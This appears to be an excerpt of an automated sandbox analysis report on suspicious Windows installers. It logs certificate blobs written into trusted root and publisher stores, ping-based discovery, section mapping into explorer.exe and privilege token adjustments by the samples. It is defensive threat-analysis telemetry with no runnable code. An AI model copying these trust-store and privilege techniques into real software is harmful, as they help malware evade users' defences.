Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Full Program Features.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B	nrl0jkg334t.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7	nrl0jkg334t.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	nrl0jkg334t.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	nrl0jkg334t.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	nrl0jkg334t.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

5140 PING.EXE
6456 PING.EXE
4476 PING.EXE
7528 PING.EXE
9608 PING.EXE

pid	process
5140	PING.EXE
6456	PING.EXE
4476	PING.EXE
7528	PING.EXE
9608	PING.EXE

Script User-Agent 27 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	146	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	186	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	542	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	141	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	375	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	432	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	466	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	469	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	490	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	493	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	499	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	355	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	551	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	350	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	368	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	492	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	510	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	140	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	215	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	496	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	425	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	367	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	193	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	233	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	240	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	353	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	473	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exesvchost.exerundll32.exesetups.tmpprolab.tmpjfiag3g_gg.exeirecord.tmpmultitimer.exeGetupycore.exe

pid	process
4672	rundll32.exe
4672	rundll32.exe
3632	svchost.exe
3632	svchost.exe
5112	rundll32.exe
5112	rundll32.exe
4228	setups.tmp
4228	setups.tmp
4264	prolab.tmp
4264	prolab.tmp
504	jfiag3g_gg.exe
504	jfiag3g_gg.exe
4392	irecord.tmp
4392	irecord.tmp
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
4928	multitimer.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe
1128	Getupycore.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3044

pid	process
3044

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

toolspab1.exetoolspab1.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
5296	toolspab1.exe
6116	toolspab1.exe
5560
5560
5560
5560
3044
3044
3044
3044
3044
3044
3044
3044
1656	explorer.exe
1656	explorer.exe
1656	explorer.exe
1656	explorer.exe
1656	explorer.exe
1656	explorer.exe
3044
3044
3044
3044
1656	explorer.exe
1656	explorer.exe
5896	explorer.exe
5896	explorer.exe
5896	explorer.exe
5896	explorer.exe
5896	explorer.exe
5896	explorer.exe
5896	explorer.exe
5896	explorer.exe
3044
3044
3044
3044
5380	explorer.exe
5380	explorer.exe
5380	explorer.exe
5380	explorer.exe
5380	explorer.exe
5380	explorer.exe
5380	explorer.exe
5380	explorer.exe
1656	explorer.exe
1656	explorer.exe
3044
3044
5896	explorer.exe
5896	explorer.exe
5380	explorer.exe
5380	explorer.exe
1656	explorer.exe
1656	explorer.exe
5380	explorer.exe
5380	explorer.exe
5896	explorer.exe
5896	explorer.exe
1656	explorer.exe
1656	explorer.exe
5380	explorer.exe
5380	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Three.exeHookSetp.exeMicrosoft.exeppppppfy.exerundll32.exesvchost.exerundll32.exemultitimer.exesvchost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3200	Three.exe
Token: SeDebugPrivilege	2976	HookSetp.exe
Token: SeDebugPrivilege	4220	Microsoft.exe
Token: SeDebugPrivilege	4248	ppppppfy.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeTcbPrivilege	3632	svchost.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	4672	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	5112	rundll32.exe
Token: SeDebugPrivilege	4928	multitimer.exe
Token: SeAuditPrivilege	2420	svchost.exe
Token: SeAuditPrivilege	2420	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2684	svchost.exe
Token: SeIncreaseQuotaPrivilege	2684	svchost.exe
Token: SeSecurityPrivilege	2684	svchost.exe
Token: SeTakeOwnershipPrivilege	2684	svchost.exe
Token: SeLoadDriverPrivilege	2684	svchost.exe
Token: SeSystemtimePrivilege	2684	svchost.exe
Token: SeBackupPrivilege	2684	svchost.exe
Token: SeRestorePrivilege	2684	svchost.exe
Token: SeShutdownPrivilege	2684	svchost.exe
Token: SeSystemEnvironmentPrivilege	2684	svchost.exe
Token: SeUndockPrivilege	2684	svchost.exe
Token: SeManageVolumePrivilege	2684	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2684	svchost.exe
Token: SeIncreaseQuotaPrivilege	2684	svchost.exe
Token: SeSecurityPrivilege	2684	svchost.exe
Token: SeTakeOwnershipPrivilege	2684	svchost.exe
Token: SeLoadDriverPrivilege	2684	svchost.exe
Token: SeSystemtimePrivilege	2684	svchost.exe
Token: SeBackupPrivilege	2684	svchost.exe
Token: SeRestorePrivilege	2684	svchost.exe
Token: SeShutdownPrivilege	2684	svchost.exe
Token: SeSystemEnvironmentPrivilege	2684	svchost.exe
Token: SeUndockPrivilege	2684	svchost.exe
Token: SeManageVolumePrivilege	2684	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2684	svchost.exe
Token: SeIncreaseQuotaPrivilege	2684	svchost.exe
Token: SeSecurityPrivilege	2684	svchost.exe
Token: SeTakeOwnershipPrivilege	2684	svchost.exe
Token: SeLoadDriverPrivilege	2684	svchost.exe
Token: SeSystemtimePrivilege	2684	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

prolab.tmpirecord.tmpSetup3310.tmpvpn.tmpnrl0jkg334t.exeIBInstaller_97039.tmpei111qo1fyj.tmpvict.tmp

pid	process
4264	prolab.tmp
4392	irecord.tmp
5512	Setup3310.tmp
5704	vpn.tmp
1000	nrl0jkg334t.exe
6200	IBInstaller_97039.tmp
5236	ei111qo1fyj.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
1720	vict.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
